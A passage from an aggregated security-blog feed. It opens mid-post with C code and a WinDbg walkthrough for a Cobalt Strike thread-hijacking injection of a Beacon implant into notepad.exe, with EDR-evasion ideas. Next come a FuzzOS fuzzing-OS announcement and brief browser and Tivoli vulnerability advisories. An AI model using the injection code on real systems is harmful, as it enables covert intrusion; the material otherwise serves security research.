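unsigned char *assemble(const unsigned char *ntc, const unsigned char *ctx,
                        const unsigned char *align, const unsigned char *ct,
                        int ctSize, int *ctOffset)
{
    unsigned char *buf = malloc(NTC_SIZE + CTX_SIZE + ALIGN_SIZE + ctSize);
    memcpy(buf, ntc, NTC_SIZE);                                   // NtContinue
    memcpy(buf + NTC_SIZE, ctx, CTX_SIZE);                        // CONTEXT
    memcpy(buf + NTC_SIZE + CTX_SIZE, align, ALIGN_SIZE);         // alignment
    memcpy(buf + NTC_SIZE + CTX_SIZE + ALIGN_SIZE, ct, ctSize);   // CreateThread
    *ctOffset = NTC_SIZE + CTX_SIZE + ALIGN_SIZE;
    return buf;
}
```

With these sizes, the stack alignment routine begins at offset 0x510 and the CreateThread routine at 0x514, which lines up with the call target observed in the WinDbg session (buffer base plus 0x510).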

First, VirtualAllocEx is called again.

// Inject the shellcode into the target process with read/write/execute permissions
PVOID allocateMemory = KERNEL32$VirtualAllocEx(
  processHandle,
  NULL,
  finalLength,
  MEM_RESERVE | MEM_COMMIT,
  PAGE_EXECUTE_READWRITE
);

if (allocateMemory == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to allocate memory in the remote process. Error: 0x%lx\n", KERNEL32$GetLastError());
}

Secondly, WriteProcessMemory is called to write the shellcode to the allocation.

// Write shellcode to the new allocation
BOOL writeMemory = KERNEL32$WriteProcessMemory(
  processHandle,
  allocateMemory,
  shellcodeFinal,
  finalLength,
  NULL
);

if (!writeMemory)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to write memory to the buffer. Error: 0x%lx\n", KERNEL32$GetLastError());
}

After that, RSP and RIP are set before the call to SetThreadContext. RIP will point to our final buffer and upon thread restoration, the value in RIP will be executed.

// Allocate stack space by subtracting the stack by 0x2000 bytes
cpuRegisters.Rsp -= 0x2000;

// Change RIP to point to our shellcode and typecast buffer to a DWORD64 because that is what a CONTEXT structure uses
cpuRegisters.Rip = (DWORD64)allocateMemory;

Notice that RSP is subtracted by 0x2000 bytes. @zerosum0x0’s blog post on ThreadContinue adopts this feature, to allow breathing room on the stack in order for code to execute, and I decided to adopt it as well in order to avoid heavy troubleshooting.

After that, all there is left to do is to invoke SetThreadContext, ResumeThread, and free!

SetThreadContext

// Set RIP
BOOL setRip = KERNEL32$SetThreadContext(
  desiredThread,
  &cpuRegisters
);

// Error handling
if (!setRip)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to set the target thread's RIP register. Error: 0x%lx\n", KERNEL32$GetLastError());
}

ResumeThread

// Call to ResumeThread()
DWORD resume = KERNEL32$ResumeThread(
  desiredThread
);

free

// Free the buffer used for the whole payload
MSVCRT$free(
  shellcodeFinal
);

Additionally, you should always clean up handles in your code - but especially in Beacon Object Files, as they are “sensitive”.

// Close handle
KERNEL32$CloseHandle(
  desiredThread
);
// Close handle
KERNEL32$CloseHandle(
processHandle
);

Debugger Time

Let’s use an instance of notepad.exe as our target process and attach it in WinDbg.

The PID we want to inject into is 7548 for our purposes. After loading our Aggressor Script developed earlier, we can use the command cThreadHijack 7548 TESTING, where TESTING is the name of the HTTP listener Beacon will interact with.

There we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see, the address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in WinDbg.

Great! Everything seems to be in place. As is shown in the mov rax,offset ntdll!NtContinue instruction, we can see our NtContinue routine. The beginning of the NtContinue routine should call the address of the stack alignment and CreateThread shellcode, as mentioned earlier in this blog post. Let’s see what the address 0x000001f027f20510 references, which is the memory address being called.

Perfect! As we can see by the and rsp, 0FFFFFFFFFFFFFFF0 instruction, along with the address of KERNEL32!CreateThreadStub, the NtContinue routine will first call the stack alignment and CreateThread routines. In this case, we are good to go! Let’s start now walking through execution of the code.

Upon SetThreadContext being invoked, which changes the RIP register to execute our shellcode, we can see that execution has reached the first call, which will invoke the stack alignment and CreateThread routines. Stepping through this call, as we know, will push a return address onto the stack. As mentioned previously, this will be the address of the next instruction, the call at 0x000001f027f2000a. When the CreateThread routine returns, it will return to this address. After stepping through the instruction, we can see that the address of the next call is pushed onto the stack.

Execution then reaches the bitwise AND instruction. As we can see from the above image, and rsp, 0FFFFFFFFFFFFFFF0 is redundant, as the stack pointer is already 16-byte aligned (the last 4 bits are already set to 0). Stepping through the bitwise XOR operations, RCX and RDX are set to 0.

As we know from the CreateThread prototype, the lpStartAddress parameter is a pointer to our shellcode. Looking at the above image, we can see the third argument, which will be loaded into R8, is 0x1f027ee0000. Unassembling this address in the debugger discloses this is our Beacon implant, which was injected earlier! To verify this, you can generate a raw Beacon stageless artifact in Cobalt Strike manually and run it through hexdump to verify the first few opcodes correspond.

After stepping through the instruction, the value is loaded into the R8 register. The next instruction sets R9 to 0 via xor r9, r9.

Additionally, [RSP + 0x20] and [RSP + 0x28] are set to 0, by copying the value of R9, which is now 0, to these locations. Here is what [RSP + 0x20] and [RSP + 0x28] look like before the mov [rsp + 0x20], r9 and mov [rsp + 0x28], r9 instructions and after.

After, CreateThread is placed into RAX and is called. Note CreateThread is actually CreateThreadStub. This is because most former kernel32.dll functions were placed in a DLL called KERNELBASE.DLL. These “stub” functions essentially just redirect execution to the correct KERNELBASE.dll function.

Stepping over the function, with p in WinDbg, places the CreateThread return value, into RAX - which is a handle to the local thread containing the Beacon implant.

After execution of our NtContinue routine is complete, we will receive the Beacon callback as a result of this thread.

Additionally, we can see that the value at the top of the stack points to the first “real” instruction of our NtContinue routine. A ret instruction, which is what RIP currently points to, will pop the value at RSP and place it into RIP. Executing the return redirects execution back to the NtContinue routine.

As we can see in the image above, the next call instruction calls the pop rcx instruction. This call instruction, when executed, will push the address of the pop rcx instruction onto the stack, as a return address.

Executing the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx instruction. This will be the base address used in the RVA calculations to resolve the address of the preserved CONTEXT record.

To verify if our offset is correct, we can use .cxr in WinDbg to divulge if the contiguous memory block located at RCX + 0x36 is in fact a CONTEXT record. 0x36 is chosen, as this is the value currently that is about to be added to RCX, as seen a few screenshots ago. Verifying with WinDbg, we can see this is the case.

If this would not have been the correct location of the CONTEXT record, this WinDbg extension would have failed, as the memory block would not have been parsed correctly.

Now that we have verified our CONTEXT record is in the correct place, we can perform the RVA calculation to add the correct distance to the CONTEXT record, meaning the pointer is then stored in RCX, fulfilling the PCONTEXT parameter of NtContinue.

Stepping through xor rdx, rdx, which sets the RaiseAlert parameter of NtContinue to FALSE, execution lands on the call rax instruction, which will call NtContinue.

Pressing g in the debugger then shows us quite a few DLLs are mapped into notepad.exe.

This is the Beacon implant resolving needed DLLs for various function calls - meaning our Beacon implant has been executed! If we go back into Cobalt Strike, we can see we now have a Beacon in context of notepad.exe with the same PID of 7548!

Additionally, you will notice on the victim machine that notepad.exe is fully functional! We have successfully forced a remote thread to execute our payload and restored it, all in one go.

Final Thoughts

Obviously, this technique isn’t without its flaws. There are still IOCs for this technique, including invoking SetThreadContext, amongst other things. However, this does avoid invoking any sort of action that creates a remote thread, which is still useful in most situations. This technique could be taken further, perhaps by invoking direct system calls instead of these APIs, which are susceptible to hooking by most EDR products.

Additionally, one thing to note is that since this technique suspends a thread and then resumes it, you may have to wait a few moments, or even a few minutes, for the thread to get around to executing. Interacting with the process directly will force execution, but targeting Windows processes whose threads run frequently is also a good way to avoid long waits.

I had a lot of fun implementing this technique into a BOF and I am really glad I have a reason to write more C code! Like always: peace, love, and positivity :-).

FuzzOS

6 December 2020 at 23:11

Summary

We’re going to work on an operating system which is designed specifically for fuzzing! This is going to be a streaming series for most of December which will cover making a new operating system with a strong focus on fuzzing. This means that things like the memory manager, determinism, and scalability will be the most important parts of the OS, and a lot of effort will go into making them super fast!

When

Streaming will start sometime on Thursday, December 10th, probably around 18:00 UTC, but the streams will be at relatively random times on relatively random days. I can’t really commit to specific times!

Streams will likely be 4-5 days a week (probably M-F), and probably 8-12 hours in length. We’ll see, who knows, depends how much fun we have!

Where

You’ll be able to find the streams live on my Twitch Channel, and if you’re unlucky and miss the streams, you’ll be able to find the recordings on my YouTube Channel! Don’t forget to like, comment, and subscribe, of course.

What

So… ultimately, I don’t really know what all will happen. But, I can predict a handful of things that we’ll do. First of all, it’s important to note that these streams are not training material. There is no prepared script, materials, flow, etc. If we end up building something totally different, that’s fine and we’re just going with the flow. There is no requirement of completing this project, or committing to certain ways the project will be done. So… with that aside.

We’ll be working on making an operating system, specifically for x86-64 (Intel flavor processors at the start, but AMD should work in non-hypervisor mode). This operating system will be designed for fuzzing, which means we’ll want to focus on making virtual memory management extremely fast. This is the backbone of most performant fuzzing, and we’ll need to be able to map in, unmap, and restore pages as they are modified by a fuzz case.

To keep you on the edge of your toes, I’ll first start with the boring things that we have to do.

OS

We have to make an operating system which boots. We’re gonna make a UEFI kernel, and we might dabble in running it on ARM64 as most of our code will be platform agnostic. But, who knows. It’ll be a pretty generic kernel, I’m mainly going to develop it on bare metal, but of course, we’ll make sure it runs on KVM/Xen/Hyper-V such that it can be used in a cloud environment.

ACPI

We’re gonna need to write ACPI table parsers such that we can find the NUMA locality of memory and CPUs on the system. This will be critical to getting a high performance memory manager that scales with cores.

Multi-processing

Of course, the kernel will support multiple cores, as otherwise it’s kinda useless for compute.

10gbit networking + TCP stack

Since I never work with disks, I’m going to follow my standard model of just using the network as general purpose whatever. To do this, we’ll need 10gbit network drivers and a TCP stack such that we can communicate with the rest of a network. Nothing too crazy here, we’ll probably borrow some code from Chocolate Milk.


Interesting stuff

Okay, that stuff was boring, lets talk about the fun parts!

Exotic memory model

Since we’ll be “snapshotting” memory itself, we need to make sure things like pointers aren’t a problem. The fastest, easiest, and best solution to this, is simply to make sure the memory always gets loaded at the same address. This is no problem for a single core, but it’s difficult for multiple cores, as they need to have copies of the same data mapped at the same location.

What’s the solution? Well of course, we’ll have every single core on the system running its own address space. This means there is no shared memory between cores (with some very, very minor exceptions). Not only does this lead to exceptionally high memory access performance (due to caches only being in the exclusive or shared states), but it also means that shared (mutable) memory will not be a thing! This means that we’ll do all of our core synchronization through message passing, which is higher latency in the best case than shared memory models, but with the advantage of scaling much better. As long as our messages can be serialized to TCP streams, that means we can scale across the network without any effort.
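As a minimal sketch of this shared-nothing model, the snippet below uses std threads and channels as stand-ins for cores and the kernel's message-passing primitive (`Message` and `run_cores` are illustrative names, not the actual OS API):

```rust
use std::sync::mpsc;
use std::thread;

// Illustrative message type; in the real OS these would be serialized
// onto TCP streams to scale across the network.
enum Message {
    Stats { cases: u64 },
}

// Spawn `n` "cores" that share nothing and communicate only by sending
// messages back; returns the total number of fuzz cases reported.
fn run_cores(n: u64) -> u64 {
    let (tx, rx) = mpsc::channel();
    let mut workers = Vec::new();
    for _ in 0..n {
        let tx = tx.clone();
        workers.push(thread::spawn(move || {
            // Each core owns its own state; no locks, no shared memory
            tx.send(Message::Stats { cases: 1 }).unwrap();
        }));
    }
    drop(tx); // drop our sender so `rx.iter()` terminates
    let total: u64 = rx
        .iter()
        .map(|m| match m { Message::Stats { cases } => cases })
        .sum();
    for w in workers { w.join().unwrap(); }
    total
}

fn main() {
    // Four cores each report one case; all synchronization is messages
    assert_eq!(run_cores(4), 4);
    println!("message passing works");
}
```

The same receive loop would work whether the sender is a local core or a socket on another machine, which is the whole point of keeping messages serializable.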

This has some awesome properties since we no longer need any locks on our page tables to add and remove entries, nor do we need to perform any TLB shootdowns, which can cost tens of thousands of cycles.

I used this model in Sushi Roll, and I really miss it. It had incredibly good performance properties and forced a bit more thought about sharing information between cores.

Scaling

As with most things I write, linear scaling will be required, and scaling across the network is just implied, as it’s required for really any realistic application of fuzzing.

Fast and differential memory snapshotting

So far, none of these things are super interesting. I’ve had many OSes that do these things well, for fuzzing, for quite a long time. However, I’ve never made these memory management techniques into a true data structure, rather I’ve used them as needed, manually. I plan to make the core of this operating system a combination of Rust procedural macros and virtual memory management tricks to allow for arbitrary data structures to be stored in a tree-shaped checkpointed structure.

This will allow for fast transitions between different states of the structure as they were snapshotted. This will be done by leveraging the dirty bits in the page tables, and creating an allocator that will allocate in a pool of memory which will be saved and restored on snapshots. This memory will be treated as an opaque blob internally, and thus it can hold any information you want: device state, guest memory state, register state, something completely unrelated to fuzzing, it won’t matter. To handle nested structures (or more specifically, pointers in structures which are to be tracked), we’ll use a Rust procedural macro to disallow untracked pointers within tracked structures.

Effectively, we’re going to heavily leverage the hardware’s MMU to differentially snapshot, teleport between, and restore blobs of memory. For fuzzing, this is necessary as a way to hold guest memory state and register state. By treating this opaquely, we can focus on doing the MMU aspects really well, and stop worrying about special casing all these variables that need to be restored upon resets.
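A toy model of the differential restore idea, tracking dirtied pages by hand where the real thing would read the MMU's dirty bits out of the page tables (`SnapMem` and everything in it is made up for this sketch):

```rust
use std::collections::BTreeSet;

const PAGE_SIZE: usize = 4096;

// Toy model of differential snapshotting: writes record which pages were
// touched, and a restore only copies those pages back from the snapshot.
struct SnapMem {
    mem: Vec<u8>,
    snapshot: Vec<u8>,
    dirty: BTreeSet<usize>, // indices of pages written since the snapshot
}

impl SnapMem {
    fn new(pages: usize) -> Self {
        let mem = vec![0u8; pages * PAGE_SIZE];
        SnapMem { snapshot: mem.clone(), mem, dirty: BTreeSet::new() }
    }

    // Take a snapshot of the current state; analogous to copying memory
    // out and clearing all dirty bits.
    fn snapshot(&mut self) {
        self.snapshot.copy_from_slice(&self.mem);
        self.dirty.clear();
    }

    // A write path that records the dirtied page, like the MMU setting a
    // dirty bit on first write.
    fn write(&mut self, addr: usize, val: u8) {
        self.dirty.insert(addr / PAGE_SIZE);
        self.mem[addr] = val;
    }

    // Restore only the pages that changed; returns how many were copied.
    fn restore(&mut self) -> usize {
        let n = self.dirty.len();
        for &page in &self.dirty {
            let off = page * PAGE_SIZE;
            self.mem[off..off + PAGE_SIZE]
                .copy_from_slice(&self.snapshot[off..off + PAGE_SIZE]);
        }
        self.dirty.clear();
        n
    }
}

fn main() {
    let mut m = SnapMem::new(16);
    m.snapshot();
    m.write(5, 0xAA); // two writes, but only one page gets dirtied
    m.write(6, 0xBB);
    assert_eq!(m.restore(), 1); // restore touches 1 page, not all 16
    assert_eq!(m.mem[5], 0);
    println!("differential restore");
}
```

The payoff is that a fuzz case lasting microseconds typically dirties a handful of pages, so a reset costs a few page copies instead of a full memory copy.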

Linux emulator

Okay, so all of that is kinda to make room for developing high performance fuzzers. In my case, I want this mainly for a new rewrite of vectorized emulation, but to make it interesting for others, we’re going to implement a Linux emulator capable of running QEMU.

This means that we’ll be able to (probably statically only) compile QEMU. Then we can take this binary, and load it into our OS and run QEMU in our OS. This means we can control the syscall responses to the requests QEMU makes. If we do this deterministically (we will), this means QEMU will be deterministic. Which thus means, the guest inside of QEMU will also be deterministic. You see? This is a technique I’ve used in the past, and it works exceptionally well. We’ll definitely outperform Linux’s handling of syscalls, we’ll scale better, and we’ll blow Linux away when it comes to memory management.
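The determinism trick can be sketched like this: every syscall answer is derived from emulator state and never from the host, so two runs observe identical results (the syscall set and all names here are invented for the example, not the actual emulator):

```rust
// A deterministic "Linux": syscall results come from emulator state only.
struct Emu { fake_time_ns: u64, rng: u64 }

impl Emu {
    fn new() -> Self { Emu { fake_time_ns: 0, rng: 0x1234_5678 } }

    // clock_gettime: time advances by a fixed step per call, so the guest
    // sees monotonic time, but identical values on every run.
    fn sys_clock_gettime(&mut self) -> u64 {
        self.fake_time_ns += 1_000;
        self.fake_time_ns
    }

    // getrandom: a fixed-seed xorshift instead of host entropy, so even a
    // "random-seeded" guest hash table gets the same seed every run.
    fn sys_getrandom(&mut self) -> u64 {
        self.rng ^= self.rng << 13;
        self.rng ^= self.rng >> 7;
        self.rng ^= self.rng << 17;
        self.rng
    }
}

// Record the results a guest would observe from a few syscalls.
fn trace(emu: &mut Emu) -> Vec<u64> {
    vec![
        emu.sys_clock_gettime(),
        emu.sys_getrandom(),
        emu.sys_clock_gettime(),
    ]
}

fn main() {
    // Two independent runs see byte-identical syscall results.
    let (mut a, mut b) = (Emu::new(), Emu::new());
    assert_eq!(trace(&mut a), trace(&mut b));
    println!("deterministic");
}
```

With no entropy leaking in through syscalls, everything downstream (interrupt timing, context switches, hash table ordering) replays identically, which is what makes every bug reproduce.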

KVM emulator + hypervisor

So, I have no idea how hard this would be, but from about 5 minutes of skimming the interwebs, it seems that I could pretty easily write a hypervisor in my OS that emulates KVM ioctls. Meaning QEMU would just think KVM is there, and use it!

This will give us full control of QEMU’s determinism, syscalls, performance, and reset speeds… without actually having to modify QEMU code.
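A sketch of what faking the KVM ioctl surface could look like. The ioctl numbers below match Linux's `kvm.h` (`_IO(0xAE, nr)`) and the API-version check QEMU performs, but the dispatch shape and `FakeKvm` type are purely illustrative:

```rust
// Ioctl request numbers from Linux's kvm.h: _IO(KVMIO, nr) with KVMIO = 0xAE.
const KVM_GET_API_VERSION: u64 = 0xAE00;
const KVM_CREATE_VM: u64 = 0xAE01;

// Our in-kernel stand-in for /dev/kvm; QEMU would talk to this without
// knowing the real KVM module isn't there.
struct FakeKvm { next_vm_fd: i64 }

impl FakeKvm {
    fn ioctl(&mut self, request: u64) -> i64 {
        match request {
            // QEMU checks this first and bails unless it's 12
            KVM_GET_API_VERSION => 12,
            // Hand out a fresh "fd" representing a new VM
            KVM_CREATE_VM => {
                let fd = self.next_vm_fd;
                self.next_vm_fd += 1;
                fd
            }
            // -ENOTTY for anything we haven't implemented yet
            _ => -25,
        }
    }
}

fn main() {
    let mut kvm = FakeKvm { next_vm_fd: 3 };
    assert_eq!(kvm.ioctl(KVM_GET_API_VERSION), 12); // QEMU's sanity check passes
    let vm = kvm.ioctl(KVM_CREATE_VM);
    println!("created vm fd {}", vm);
}
```

Since the "ioctl" is just a function call at the same privilege level, there is no QEMU → OS → KVM transition cost, which is where the performance win in the paragraph above comes from.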

That’s it

So that’s the plan. An OS + fast MMU code + hypervisor + Linux emulator, to allow us to deterministically run anything QEMU can run, which is effectively everything. We’ll do this with performance likely into the millions of VM resets per second per core, scaling linearly with cores, including over the network, to allow some of the fastest general purpose fuzzing the world has ever seen :D

FAQ

Some people have asked questions on the internet, and I’ll post them here:

Hackernews Q1

Q:

Huh. So my initial response was, "why on earth would you need a whole OS for that", but memory snapshotting and improved virtual memory performance might actually be a good justification. Linux does have CRIU which might be made to work for such a purpose, but I could see a reasonable person preferring to do it from a clean slate. On the other hand, if you need qemu to run applications (which I'm really unclear about; I can't tell if the plan is to run stuff natively on this OS or just to provide enough system to run qemu and then run apps on linux on qemu) then I'm surprised that it's not easier to just make qemu do what you want (again, I'm pretty sure qemu already has its own memory snapshotting features to build on).

Of course, writing an OS can be its own reward, too:) 

A:

Oooh, wasn't really expecting this to make it to HN cause it was meant to be more of an announcement than a description.

But yes, I've done about 7 or 8 operating systems for fuzzing in the past and it's a massive performance (and cleanliness) cleanup. This one is going to be like an operating system I wrote 2-3 years ago for my vectorized emulation work.

To answer your QEMU questions, the goal is to effectively build QEMU with MUSL (just to make it static so I don't need a dynamic loader), and modify MUSL to turn all syscalls into `call` instructions. This means a "syscall" is just a call to another area, which will be my Rust Linux emulator. I'll implement the bare minimum syscalls (and enum variants to those syscalls) to get QEMU to work, nothing more. The goal is not to run Linux applications, but to run a QEMU+MUSL combination which may be modified lightly if it means a lower emulation burden (eg. getting rid of threading in QEMU [if possible] so we can avoid fork())

The main point of this isn't performance, it's determinism, but that is a side effect. A normal syscall instruction involves a context switch to the kernel, potentially cr3 swaps depending on CPU mitigation configuration, and the same to return back. This can easily be hundreds of cycles. A `call` instruction to something that handles the syscall is on the order of 1-4 cycles.

While for syscalls this isn't a huge deal, it's even more emphasized when it comes to KVM hypercalls. Transitions to a hypervisor are very expensive, and in this case, the kernel, the hypervisor, and QEMU (eg. device emulation) will all be running at the same privilege level and there won't be a weird QEMU -> OS -> KVM -> other guest OS device -> KVM -> OS -> QEMU transition every device interaction.

But then again, it's mainly for determinism. By emulating Linux deterministically (eg. not providing entropy through times or other syscall returns), we can ensure that QEMU has no source of external entropy, and thus, will always do the same thing. Even if it uses a random-seeded hash table, the seed would be derived from syscalls, and thus, will be the same every time. This determinism means the guest always will do the same thing, to the instruction. Interrupts happen on the same instructions, context switches do, etc. This means any bug, regardless of how complex, will reproduce every time.

All of this syscall emulation + determinism I have also done before, in a tool called tkofuzz that I wrote for Microsoft. That used Linux emulation + Bochs, and it was written in userspace. This has proven incredibly successful and it's what most researchers are using at Microsoft now. That being said, Bochs is about 100x slower than native execution, and now that people have gotten a good hold of snapshot fuzzing (there's a steep learning curve), it's time to get a more performant implementation. With QEMU we get this with a JIT, which at least gets us a 2-5x improvement over Bochs while still "emulating", but even more value could be found if we get the KVM emulation working and can use a hypervisor. That being said, I do plan to support a "mode" where guests which do not touch devices (or more specifically, snapshots which are taken after device I/O has occurred) will be able to run without QEMU at all. We're really only using QEMU for device emulation + interrupt control, thus, if you take a snapshot to a function that just parses everything in one thread, without process IPC or device access (it's rare, when you "read" from a disk, you're likely just hitting OS RAM caches, and thus not devices), we can cut out all the "bloat" of QEMU and run in a very very thin hypervisor instead.

In fuzzing it's critical to have ways to quickly map and unmap memory as most fuzz cases last for hundreds of microseconds. This means after a few hundred microseconds, I want to restore all memory back to the state "before I handled user input" and continue again. This is extremely slow in every conventional operating system, and there's really no way around it. It's of course possible to make a driver or use CRIU, but these are still not exactly the solution that is needed here. I'd rather just make an OS that trivially runs in KVM/Hyper-V/Xen, and thus can run in a VM to get the cross-platform support, rather than writing a driver for every OS I plan to use this on.

Stay cute, ~gamozo 

Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Tivoli Madness

18 November 2020 at 15:40
By: voidsec

TL;DR: this blog post serves as an advisory for both: CVE-2020-28054, an Authorization Bypass vulnerability affecting JamoDat – TSMManager Collector v. <= 6.5.0.21, and a Stack Based Buffer Overflow affecting IBM Tivoli Storage Manager – ITSM Administrator Client Command Line Administrative Interface (dsmadmc.exe) Version 5, Release 2, Level 0.1. Unfortunately, after I had one of […]

The post Tivoli Madness appeared first on VoidSec.

MSIE 11 garbage collector attribute type confusion

5 March 2021 at 18:05

(MS16-063, CVE-2016-0199)

With MS16-063 Microsoft has patched CVE-2016-0199: a memory corruption bug in the garbage collector of the JavaScript engine used in Internet Explorer 11. By exploiting this vulnerability, a website can cause this garbage collector to handle some data in memory as if it was an object, when in fact it contains data for another type of value, such as a string or number. The garbage collector code will use this data as a virtual function table (vftable) in order to make a virtual function call. An attacker has enough control over this data to allow execution of arbitrary code.

MS Edge Tree::ANode::IsInTree use-after-free (MemGC) & Abandonment

5 March 2021 at 18:05

A specially crafted Javascript inside an HTML page can trigger a use-after-free bug in Tree::ANode::IsInTree or a breakpoint in Abandonment::InduceAbandonment in Microsoft Edge. The use-after-free bug is mitigated by MemGC: if MemGC is enabled (which it is by default) the memory is never freed. This effectively prevents exploitation of the issue. The Abandonment appears to be triggered by a stack exhaustion bug; the Javascript creates a loop where an event handler triggers a new event, which in turn triggers the event handler, etc. This consumes stack space until there is no more stack available. Edge does appear to be able to handle such a situation gracefully under certain conditions, but not all. It is easy to avoid those conditions to force triggering the Abandonment.

The interesting thing is that this indicates that the assumption that "hitting Abandonment means a bug is not a security issue" may not be correct in all cases.

MS Edge CDOMTextNode::get_data type confusion

5 March 2021 at 18:05

(MS16-002, CVE-2016-0003)

Specially crafted Javascript inside an HTML page can trigger a type confusion bug in Microsoft Edge that allows accessing a C++ object as if it was a BSTR string. This can result in information disclosure, such as allowing an attacker to determine the value of pointers to other objects and/or functions. This information can be used to bypass ASLR mitigations. It may also be possible to modify arbitrary memory and achieve remote code execution, but this was not investigated.

MSIE 9-11 MSHTML PROPERTYDESC::HandleStyleComponentProperty out-of-bounds read

5 March 2021 at 18:05

(MS16-104, CVE-2016-3324)

A specially crafted web-page can cause Microsoft Internet Explorer 9-11 to assume a CSS value stored as a string can only be "true" or "false". To determine which of these two values it is, the code checks if the fifth character is an 'e' or a '\0'. An attacker that is able to set it to a smaller string can cause the code to read data out-of-bounds and is able to determine if a WCHAR value stored behind that string is '\0' or not.
